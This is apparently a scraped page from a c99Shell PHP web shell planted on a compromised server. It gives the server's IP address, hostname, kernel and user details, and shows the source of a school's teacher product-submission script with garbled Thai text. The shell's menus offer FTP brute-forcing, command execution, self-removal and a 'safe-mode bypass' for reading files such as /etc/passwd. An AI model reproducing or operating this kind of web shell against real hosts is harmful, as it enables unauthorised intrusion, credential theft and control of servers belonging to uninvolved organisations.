110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher/ drwxr-xr-x Free 52.66 GB of 127.8 GB (41.2%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

 session_start();

 if (session_is_registered("valid_user"))

 {

$Username = $valid_user;

include("../include/FunctionDB.php");



  ConnectDB();

$Flag = true;

$Prod_name = htmlspecialchars(trim($_POST[Prod_name]));

$Prod_type = htmlspecialchars(trim($_POST[Prod_type]));

$Benefit = htmlspecialchars(trim($_POST[Benefit]));

$Fund_resource = htmlspecialchars(trim($Fund_resource));

$Propagate = htmlspecialchars(trim($_POST[Propagate]));

$Date_start = $_POST['mYear1']."-".$_POST['mMonth1']."-".$_POST['mDate1'];

$Date_finish = $_POST['mYear2']."-".$_POST['mMonth2']."-".$_POST['mDate2'];

$Term = htmlspecialchars(trim($_POST[Term]));

$Benefit = htmlspecialchars(trim($_POST[Benefit]));

$Use_ref = htmlspecialchars(trim($_POST[Use_ref]));

//////////////// check  Production name

if ($Prod_name =="")

{

$msg .="<li>ЎГШіТЎГНЎ ЄЧиНјЕ§Т№";

$button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";

$Flag = false;

}

///////////////////////////////////

if ($Term =="")

{

$msg .="<li>ЎГШіТЎГНЎ »ХЎТГИЦЎЙТ";

$button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";

$Flag = false;

}

///////////////////////  Check Address



   if( $Flag)

    {

     InsertProduct($Teacher_code,$Prod_name,$Date_start,$Date_finish,$Term,$Prod_type,$name1,$name2,$name3,$name4,$name5,$name6,$name7,$Fund_resource,$Fund,$Propagate,$Benefit,$Use_ref);

            $msg.="<li>јЕ§Т№<b>$Prod_name</b>";

          $msg.="<li>ГРєєЁСґаЎзєўйНБЩЕўН§·иТ№аГХВєГйНВбЕйЗ";

              echo"<meta http-equiv=\"refresh\" content=\"2;URL=Edu_ProductMe.php?Teacher_code=$Teacher_code\">\n";

    }    CloseDB();

?>

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<link href="../css/style1.css" rel="stylesheet" type="text/css">

</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"marginwidth="0"marginheight="0">

<form>

<br>

  <table width="64%" border="0" cellspacing="0"cellpadding="2"align="center">

    <tr>

      <td><div align="center"><span><b><font color="#003366" size="4" face="Tahoma">::їНГмБЎТГаѕФиБўйНБЩЕјЕ§Т№·Т§ЗФЄТЎТГ::</font></b></span></div></td>

</tr>

<tr>

<td>

<table width="100%" border="0" cellspacing="1"cellpadding="0"align="center" class="table">

          <tr>

            <td bgcolor="#D5F0F9"><div align="center"><b><font color="#003366" size="3" face="Tahoma">ГРєєбЁй§</font></b></div></td>

</tr>

<tr>

            <td bgcolor="#000000"> 

              <table width="90%" border="0" cellspacing="0"cellpadding="2"align="center">

<tr>

<td><span><b><font color="#FFFFFF"><?php echo $msg;?></font></b></span></td>

</tr>

</table>

</td>

</tr>

<tr>

            <td bgcolor="#D5F0F9"> 

              <div align="center"><b><font color="#CCFF00"><?php echo $button;?></font></b></div></td>

</tr>

</table>

</td>

</tr>

</table>

<br>

<br>

</form>

</body>

</html>

<?php 

    }

else

{

       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";

       echo"Please Login ";

}

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: